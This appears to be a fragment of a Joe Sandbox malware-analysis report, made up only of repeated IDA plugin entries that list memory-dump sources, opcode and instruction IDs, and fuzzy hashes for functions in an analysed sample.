                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: tP^q
                                                                                                                                                                                                              • API String ID: 0-2862610199
                                                                                                                                                                                                              • Opcode ID: 808aab806e2d3238573fa7cbee5fadde5f5ced163cfb11f8ae766479236451ce
                                                                                                                                                                                                              • Instruction ID: a36fee7086cd54b00a201de1711c5f9e03af9e1b7af11960d9a29767364435b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 808aab806e2d3238573fa7cbee5fadde5f5ced163cfb11f8ae766479236451ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52315A753102108FCB49AB78D45886D7BE2EF8A71632105F9E94ACF3B6DA75DC42CB81
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 8bq
                                                                                                                                                                                                              • API String ID: 0-187764589
                                                                                                                                                                                                              • Opcode ID: c5da4b8876ed7cc296243f0c7f2339ef4a40b3b186b4d9f20dce695c3166a4dd
                                                                                                                                                                                                              • Instruction ID: 82ffc5c391fbadcdc7629c4aa129a0ab08c5d14e055465877ad88b9f7e054bbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5da4b8876ed7cc296243f0c7f2339ef4a40b3b186b4d9f20dce695c3166a4dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0F0E2752016508FC702E7B8A451AF9BBE0EF8931970481AAE1498B3B6CE684C07CB81
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 8bq
                                                                                                                                                                                                              • API String ID: 0-187764589
                                                                                                                                                                                                              • Opcode ID: 54b1af1cc4bf03e7c0283aec39780abd725890ca473d48d8d6e3ae771497de4d
                                                                                                                                                                                                              • Instruction ID: 53082d652b3084fff1145afc56ad3a27318627bc105bb3434ed93e604075f1fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54b1af1cc4bf03e7c0283aec39780abd725890ca473d48d8d6e3ae771497de4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93E09274200610CFC601F7FDE400A6AB7D5EF8D309B008469E1098B3A9CE74AC018BC1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a15c47406966c17b25aa7459c1c73b45adbf0421ed6ea5f431e9874a870145a0
                                                                                                                                                                                                              • Instruction ID: 8cc28c2c3041a6978bebabcca4a207da8afa2f3ae33a33fd71345369392e18aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a15c47406966c17b25aa7459c1c73b45adbf0421ed6ea5f431e9874a870145a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D851D130A002049FD705EBB8C8586AEBBF2FF89305F1584AAD445DB351EF759D46C782
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6d7c6c01179eae3164afc8db0706a8a222fdd750759f4572d159da798fcdc635
                                                                                                                                                                                                              • Instruction ID: 0cbecb1f6fd50a9758dc0d31aca946832444dd5a5971f9fe21510a2e7da6e928
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d7c6c01179eae3164afc8db0706a8a222fdd750759f4572d159da798fcdc635
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C711C079200640DFCB02ABB4F4899B97FB1FF4922971582E9E8088B373CB65D806DB00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 929276408d9f5cdc85d0b473e1918dab129ef73a2c90607853311df8cf908d96
                                                                                                                                                                                                              • Instruction ID: 8e2badca43a1ae4861c41ee024f09ff8b1e00b4eb9d8385b098b4aac310ce00e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 929276408d9f5cdc85d0b473e1918dab129ef73a2c90607853311df8cf908d96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F481D031A00204DFDB05FBB8D8446AEB7E2FF88315F10896AE4099B365DF759D46CB81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c6eb517c25d738c9fdb58431f27f098e43274c8cf283c7dd71456366b2b834e2
                                                                                                                                                                                                              • Instruction ID: cc02e4657d3da0f0dcaaba3c09949384278b0a95d51cd0beef376c48f15aa9c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6eb517c25d738c9fdb58431f27f098e43274c8cf283c7dd71456366b2b834e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13216D30B002058FEB14BBB8C5583ADB3E2FF88719F118469D449D7355DF799C468786
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5b7cb8211881adf4871dc90abda3bd0f0f0690262a6d3656b688af8c53160aa3
                                                                                                                                                                                                              • Instruction ID: 985b4949a36467bb202ea24f6fa75b3593379c27ddf223b3c7d4047b02a1681e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b7cb8211881adf4871dc90abda3bd0f0f0690262a6d3656b688af8c53160aa3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54E0C234248280CFC3025B70E0188683F71DF4E23031641E6D8848B733C6298892CB00